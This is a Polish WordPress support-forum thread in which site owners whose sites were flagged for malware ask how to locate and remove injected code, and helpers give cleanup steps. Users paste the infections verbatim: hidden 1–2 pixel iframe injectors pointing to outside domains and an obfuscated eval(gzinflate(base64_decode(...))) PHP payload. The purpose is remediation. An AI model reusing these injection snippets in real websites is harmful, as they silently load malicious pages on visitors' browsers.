Wsparcie » Zaawansowane » Złośliwe oprogramowanie

  • Rozwiązano Pysio

    (@pysio)


    Cześć,
    google zablokowało moją stronę ponieważ odkryli złośliwy kod ma mojej stronie. W szczegółach znalazłem go. Wygląda on tak:

    <script type="text/javascript">
    document.write('<iframe src="http://poseyhumane.org/stats.ph
    p" name="Twitter" scrolling="auto" frameborder="no" align="c
    enter" height="2" width="2"></iframe>');
    </script>

    Czy ktoś może mi w jakiś sposób podpowiedzieć jak znaleźć ten kod w stercie innych kodów? Gdzie go szukać? Podejrzewam, że zadomowił się w folderze wp-content ale nie wiem gdzie go dalej szukać.

Viewing 15 replies - 1 through 15 (of 35 total)
  • Na samym początku możesz zrobić backup bazy i plików – tak na wszelki wypadek.

    Zaloguj się przez ftp i szukaj po datach modyfikacji plików – złośliwy kod najczęściej znajdziesz w ostatnio zmodyfikowanych plikach (
    o ile szkodnik ich nie fałszuje).
    Jeżeli znajdziesz jakieś pliki z „niespodzianką” – odnotuj czasy ich modyfikacji – przyda się to do sprawdzenia w logach dostępu serwera w jaki sposób doszło do infekcji.
    Gdy to zrobisz, kasujesz katalogi wp-admin i wp-includes, w ich miejsce wrzucasz świeże ich kopie z ostatniej paczki wordpressa.
    Potem nadpisujesz pliki z katalogu głównego twojego bloga plikami z paczki.
    Następnie kasujesz wszystkie wtyczki, potem zaciągasz ich świeże kopie z repozytorium i wypakowujesz.
    Podobnie robisz z motywami …jeżeli wprowadzałeś w nie własne modyfikacje, to musisz je powtórzyc na czystym szablonie ….albo bardzo dokładnie czyścić ręcznie stary szablon.

    Na koniec zostaje sprawdzić dokładnie wszystkie nie nadpisane pliki – wszystkie jakich nie ma w oryginalnej paczce m.in. .htaccess, pliki konfiguracyjne etc.
    Jezeli masz jakiś cache, musisz go wyczyścić, musisz też dokładnie sprawdzić katalog uploadu.
    Jeżeli masz więcej stron na swoim koncie np. w subdomenach – musisz je wszystkie sprawdzić.

    Przydatna lektura:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
    http://wiki.dreamhost.com/My_Wordpress_site_was_hacked

    skanery online:
    http://sitecheck.sucuri.net/scanner/
    http://www.malwarehelp.org/freeware-open-source-commercial-website-security-tools-services-downloads.html

    zabezpieczenie: http://codex.wordpress.org/Hardening_WordPress

    Thread Starter Pysio

    (@pysio)

    Kurde, wcześniej zrobiłem tak jak piszesz, pomijając krok z zobaczeniem ostatniej daty modyfikacji. Teraz widzę, że mogę mieć spory problem z tym. Cóż chyba pozostaje mi sprawdzić wszystko ręcznie za pomocą ctrl+f…

    EDIT: http://sitecheck.sucuri.net/results/dakarmoto.pl

    Wygląda na to, że zainstalowało się to we wpisach, gdzie one się na serwerze zapisują (w jakim katalogu)?
    Dodatkowo mam coś na stronie głównej, ale jaki plik jest za nią odpowiedzialny?

    Masz coś (tj. document.write z poseyhumane.org w ramce) w nagłówku, więc pewnie plik header.php. Jednak na bank to nie będzie jedyny zmodyfikowany (lub dodany) plik.

    Total commander daje możliwość przeszukania plików na serwerze pod kątem zadanej frazy. Możesz poszukać frazy „poseyhumane”, chociaż możliwe że nie tylko tą domenę będzie zawierał złośliwy kod.

    Dlatego ja bym też poszukał frazy 'height=”2″ width=”2″’. To są wymiary ramki <iframe> ze złośliwym kodem, raczej nic o takich wymiarach nie powinno znajdować się na stronie.

    Jest też opcja, że kod jest „zakodowany” 🙂 Przed wykonaniem jest odkodowywany za pomocą funkcji. Nie pamiętam nazwy tej funkcji, ale nie trudno ją znaleźć i przeszukać pliki z uwzględnieniem jej nazwy.

    Jeszcze jedna rzecz. Możliwe, że twój klient ftp jest zainfekowany. Więc najpierw sprawdź u siebie czy nie masz wirusów.

    Raczej mało prawdopodobne by było to jawnym tekstem osadzone, bardziej prawdopodobna wstawka kodowana – tak wiec trzeba by szukać m.in. wystapień: eval( czy base64_decode …możliwe też bardziej wyszukane kombinacje, tak więc trzeba szukać wszystkiego co nietypowe.

    Można też przeskanować konto tym skryptem w poszukiwaniu najpopularniejszych backdoorów.

    Thread Starter Pysio

    (@pysio)

    Udało się coś znaleźć w sekcji header po frazie:
    base64_decode

    Wcześniej wysłałem link ze stroną, którą polecił adpawl, tam wskazuje kilka linków, podejrzewam, że są to strony z wpisami ( /?p640 np)
    gdzie ich szukać?

    Aha, poprosiłem na samym początku serwis hostingowy aby przeskanował moją stronę to wysłali mi raport. Dodatkowo ściągnąłem do siebie cały folder public_html i go przeskanowałem antywirusem.

    Mam ten sam problem. Chciałem podłączyć się pod problem i proszę o pomoc. Niestety stosując się do rad powyżej nic nie wyszło. Czy może ktoś jaśniej lub dokładniej napisać jak się tej cholery pozbyć?

    Kod który to powoduje:

    <script type="text/javascript" language="javascript" > 
    
    (fu
    nction () { var ncxta = document.createElement('iframe');
    ncxta.src = 'http://prewhome.com/'; ncxta.style.positi
    on = 'absolute'; ncxta.style.border = '0'; ncxta.style
    .height = '1px'; ncxta.style.width = '1px'; ncxta.styl
    e.left = '1px'; ncxta.style.top = '1px'; if (!document
    .getElementById('ncxta')) { document.write('<div id=\
    'ncxta\'></div>'); document.getElementById('ncxta').a
    ppendChild(ncxta); }})();</script>

    @pysio, @paffci0, to że znajduje na stronie /?p640 czy innej niewiele znaczy.
    Złośliwy kod może być zaszyty równie dobrze w pliku header.php jak i footer.php, sidebar.php czy w dziesiątkach innych miejsc zależnych także od motywu jaki stosujesz.
    I powtórzę jeszcze raz, programem antywirusowym to sobie można ;-p
    -ten to co najwyżej wynajdzie kod w plikach .js o ile ma go w sygnaturach, z plikami .php czy innymi już jest spoooory problem.
    I mówię to jako człowiek, który siedzi w temacie głęboko.
    W tygodniu mam po kilka zleceń czyszczenia serwerów.
    tutaj przykładowy log z czyszczenia (gdzie żaden av nic nie znajdował) http://bit.ly/TPzvZy – i nie obejmuje on jeszcze plików .htaccess, .txt, skryptów perl, plików graficznych z „niespodzianką” etc.

    Nie ma prostej i uniwersalnej metody, każdy przypadek wymaga indywidualnego podejścia i doświadczenia.

    Dodam jeszcze, że samo odwirusowanie to jedno. Trzeba jeszcze sprawdzić w jaki sposób doszło do infekcji by móc zabezpieczyć potencjalne luki.

    W takim razie mam pytanie do kolegi @pysio czy sobie poradził w temacie a jeśli tak to prosił bym o jakieś bliższe szczegóły.

    Thread Starter Pysio

    (@pysio)

    Zapomniałem oczywiście podziękować adpawlowi 🙂 Co czynię teraz- Dziękuję
    Przeszukałem plik header pod względem frazy „base64_decode” – coś znalazło, zaznaczyłem i usunąłem. Zgłosiłem do googla prośbę o ponowne sprawdzenie, udało się.

    Witam,

    Udało mi się rozwiązać problem.
    W pliku index.php siedział ukryty skrypt. Zastosowałem się do rady i wyszukiwałem po frazie – eval. Lecz po przeskanowaniu stronki tym skanerem: http://sitecheck.sucuri.net nadal była zainfekowana jakimś malwarem. Zmieniłem hasło do ftp i dopiero po zainstalowaniu i uruchomieniu wtyczki Secure WordPress Plugin problemy zniknęły.

    Powyższa pomoc była bardzo cenna za co dziękuję 🙂

    Witam,

    Ja mam podobny problem. czy to może być ten skrypt?

    http://pastebin.com/m5MdP7ch

    Proszę o pomoc.

    Tak, to odmiana popularnego Blacole.

    Jeszcze jedno pytanie, w footer.php mam taki skrypt:

    eval(gzinflate(base64_decode('bVJRa9swEH4P5D9cTTrZEKdjG3tYbIeydexlfUhgMMYQtnWxRWTJk+RkWcl/n2S7bUirB+t8p/u+u+9ulSWM76EUuTFp8FUpizrIphNw52Uk5lI+x89PkkOtcZsGyaqtWyiEqrjcqpBoY97RTgsSLWGVBY94zh3bvIp5qWQAlluBabDebIIsuclfw39Zi8W/1peStP7j45ylNWcMJRh7dICEcdOK/PhJKolLkg21TSeVUEUuYIay/CKX0wnfhoMNVykQEj3AUEDvVE3OJaQOUmvch9U/15fILYZFbvDjB8qwVAxHgChybY7JuRDqgIw9AjyjLccXZaf1BvUe9X3e4MBBNbqSSwyDw+GwCOZBMJ/Rzd36x936Fxluen/7/Y78jkYYX/0lUnpBHz08S6qxUXukeWm5kiE5tHTbC0rmRJRNS22NDVLV+rChKBl56unk7pM33O/KTcqJ7rR36l8I20MMYxrlPfOkqZd4OsGyVjAbuL/ZRniSEwqDj7HaOR2/W47jk8pnOL7/03SyOqvA9dIvnupsGC1XGSSFHpfps2qPmle1hTelM5cwZPREzI+T/CRDysUCSyfosLwLuBUC1h7EwBqN15stkpt+/0Yt+l09t1/ubZGXu0qrTrLgIuFM0AuPh8meehw0C/uiXsm9iuOxi1ZzabchpSG5ZvCnQ83RLODagHF6SmYWZA5k1xWalzsSzaFCS2XX0PFp6FyWN6ipsaoN387hfdSzQhz3nIVix97ws8r+Aw==')));
    ?>
Viewing 15 replies - 1 through 15 (of 35 total)
  • Temat ‘Złośliwe oprogramowanie’ jest zamknięty na nowe odpowiedzi.